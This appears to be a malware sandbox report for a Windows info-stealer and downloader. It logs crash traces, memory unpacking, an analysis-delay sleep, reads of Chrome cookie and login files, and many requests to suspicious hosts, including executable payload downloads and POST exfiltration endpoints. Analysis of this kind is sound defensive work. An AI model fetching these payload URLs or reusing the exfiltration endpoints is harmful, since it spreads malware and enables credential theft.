registers.esp: 34715812 registers.edi: 0 registers.eax: 0 registers.ebp: 34715852 registers.edx: 32 registers.ebx: 34716156 registers.esi: 0 registers.ecx: 6123904	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73b34f99 0x387c6ed 0x387c79a 0x387c808 0x37f0a09 0x37f1cba 0x37f129e 0x37f15cd 0x3808939 0x3833fe8 0x383b898 0x383dbbe 0x383ddeb 0x389f571 0x389f654 ww_testll_0211_single+0x3eb9 @ 0x913eb9 ww_testll_0211_single+0x8eb1 @ 0x918eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73b334b2 registers.esp: 34715812 registers.edi: 0 registers.eax: 0 registers.ebp: 34715852 registers.edx: 32 registers.ebx: 34716156 registers.esi: 0 registers.ecx: 6123904	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99 0x395c6ed 0x395c79a 0x395c808 0x38d0a09 0x38d1cba 0x38d1290 0x38d15cd 0x38e8939 0x391d9d7 0x391ddeb 0x397f571 0x397f654 zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424 zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73bb34b2 registers.esp: 35122068 registers.edi: 0 registers.eax: 0 registers.ebp: 35122108 registers.edx: 32 registers.ebx: 35122412 registers.esi: 0 registers.ecx: 12192576	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99 0x395c6ed 0x395c79a 0x395c808 0x38d0a09 0x38d1cba 0x38d129e 0x38d15cd 0x38e8939 0x391d9d7 0x391ddeb 0x397f571 0x397f654 zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424 zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73bb34b2 registers.esp: 35122068 registers.edi: 0 registers.eax: 0 registers.ebp: 35122108 registers.edx: 32 registers.ebx: 35122412 registers.esi: 0 registers.ecx: 12192576	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99 0x395c6ed 0x395c79a 0x395c808 0x38d0a09 0x38d1cba 0x38d1290 0x38d15cd 0x38e8939 0x38e9831 0x3916065 0x3916d41 0x391dbbe 0x391ddeb 0x397f571 0x397f654 zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424 zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73bb34b2 registers.esp: 35116100 registers.edi: 0 registers.eax: 0 registers.ebp: 35116140 registers.edx: 32 registers.ebx: 35116444 registers.esi: 0 registers.ecx: 12191776	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99 0x395c6ed 0x395c79a 0x395c808 0x38d0a09 0x38d1cba 0x38d129e 0x38d15cd 0x38e8939 0x38e9831 0x3916065 0x3916d41 0x391dbbe 0x391ddeb 0x397f571 0x397f654 zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424 zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73bb34b2 registers.esp: 35116100 registers.edi: 0 registers.eax: 0 registers.ebp: 35116140 registers.edx: 32 registers.ebx: 35116444 registers.esi: 0 registers.ecx: 12191776	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99 0x395c6ed 0x395c79a 0x395c808 0x38d0a09 0x38d1cba 0x38d1290 0x38d15cd 0x38e8939 0x38e9095 0x3916eb3 0x391dbbe 0x391ddeb 0x397f571 0x397f654 zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424 zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73bb34b2 registers.esp: 35116516 registers.edi: 0 registers.eax: 0 registers.ebp: 35116556 registers.edx: 32 registers.ebx: 35116860 registers.esi: 0 registers.ecx: 11591728	1
__exception__ Nov. 4, 2021, 2:44 p.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73bb4f99 0x395c6ed 0x395c79a 0x395c808 0x38d0a09 0x38d1cba 0x38d129e 0x38d15cd 0x38e8939 0x38e9095 0x3916eb3 0x391dbbe 0x391ddeb 0x397f571 0x397f654 zz_8wjnwjcywe8dtxxwfai7o+0x2424 @ 0x882424 zz_8wjnwjcywe8dtxxwfai7o+0x4658 @ 0x884658 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73bb34b2 registers.esp: 35116516 registers.edi: 0 registers.eax: 0 registers.ebp: 35116556 registers.edx: 32 registers.ebx: 35116860 registers.esi: 0 registers.ecx: 11591728	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://45.133.1.107/server.txt
suspicious_features	Connection to IP address	suspicious_request	GET http://212.192.241.62/base/api/statistics.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://212.192.241.62/base/api/getData.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features	Connection to IP address	suspicious_request	GET http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features	Connection to IP address	suspicious_request	GET http://45.133.1.182/proxies.txt
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://212.192.241.62/service/communication.php
suspicious_features	POST method with no referer header	suspicious_request	POST http://staticimg.youtuuee.com/api/?sid=2099253&key=fd52925171e83f42fc2ded8133aae222

Performs some HTTP requests (34 events)

request	GET http://45.133.1.107/server.txt
request	GET http://212.192.241.62/base/api/statistics.php
request	POST http://212.192.241.62/base/api/getData.php
request	HEAD http://45.133.1.107/download/NiceProcessX64.bmp
request	GET http://45.133.1.107/download/NiceProcessX64.bmp
request	GET http://45.133.1.182/proxies.txt
request	POST http://212.192.241.62/service/communication.php
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	HEAD http://imgs.googlwaa.com/lqosko/p18j/cust9.exe
request	HEAD http://dataonestorage.com/search_hyperfs_209.exe
request	HEAD http://eguntong.com/pub33.exe
request	HEAD http://www.hzradiant.com/askhelp42/askinstall42.exe
request	GET http://imgs.googlwaa.com/lqosko/p18j/cust9.exe
request	GET http://eguntong.com/pub33.exe
request	HEAD http://www.hzradiant.com/askinstall42.exe
request	GET http://www.hzradiant.com/askhelp42/askinstall42.exe
request	GET http://www.hzradiant.com/askinstall42.exe
request	GET http://dataonestorage.com/search_hyperfs_209.exe
request	GET http://ip-api.com/json/
request	GET http://staticimg.youtuuee.com/api/fbtime
request	POST http://staticimg.youtuuee.com/api/?sid=2099253&key=fd52925171e83f42fc2ded8133aae222
request	HEAD http://fouratlinks.com/installpartners/ShareFolder.exe
request	GET http://fouratlinks.com/installpartners/ShareFolder.exe
request	GET https://cdn.discordapp.com/attachments/891021838312931420/902505896159113296/PL_Client.bmp
request	GET https://ipinfo.io/widget
request	GET https://cdn.discordapp.com/attachments/896617596772839426/897483264074350653/Service.bmp
request	GET https://cdn.discordapp.com/attachments/891006172130345095/905376099935080508/realV2_0301.bmp
request	GET https://yandex.ru/
request	GET https://yandex.ru/showcaptcha?cc=1&retpath=https%3A//yandex.ru/%3F_a09e8b000a282123c603bfc4a97c0306&t=2/1636005811/44697f40337ea4bdfd2de18621e47c54&u=7a6baacf-5dc3c4f0-2c5eb502-48cc2bf3&s=7586315df59045f770b5809e4db25d55
request	GET https://cdn.discordapp.com/attachments/896617596772839426/899593707228135434/Cube_WW14.bmp
request	GET https://cdn.discordapp.com/attachments/891006172130345095/905393686618193921/help0301.bmp
request	GET https://d.gogamed.com/userhome/22/any.exe
request	GET https://f.gogamef.com/userhome/22/23ce6573d0b61d1c6b7a3a8c1cdf07b2.exe
request	GET https://el5en1977834657.s3.ap-south-1.amazonaws.com/kak.exe

Sends data using the HTTP POST Method (3 events)

request	POST http://212.192.241.62/base/api/getData.php
request	POST http://212.192.241.62/service/communication.php
request	POST http://staticimg.youtuuee.com/api/?sid=2099253&key=fd52925171e83f42fc2ded8133aae222

Allocates read-write-execute memory (usually to unpack itself) (50 out of 78 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 4, 2021, 2:43 p.m.	process_identifier: 2316 region_size: 1351680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x037e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:43 p.m.	process_identifier: 2592 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 507904 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a5e000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:43 p.m.	process_identifier: 2592 region_size: 876544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02260000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2796 region_size: 1351680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x038c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 159744 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a7e000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2300 region_size: 278528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2384 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:44 p.m.	process_identifier: 2384 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 40960 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 385024 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000006c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1ed1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2150000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2150000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2150000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2150000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2150000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2151000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2151000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2151000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2151000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef214e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00122000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0003c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00170000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 4, 2021, 2:45 p.m.	process_identifier: 500 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

Zz_8WJnWJcYwE8DTXxWfai7o.exe tried to sleep 193 seconds, actually delayed analysis time by 193 seconds

Steals private information from local Internet browsers (50 out of 109 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 36\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 65\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 62\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 3\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 24\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 75\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 98\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 28\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 93\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 92\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 97\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 47\Cookies
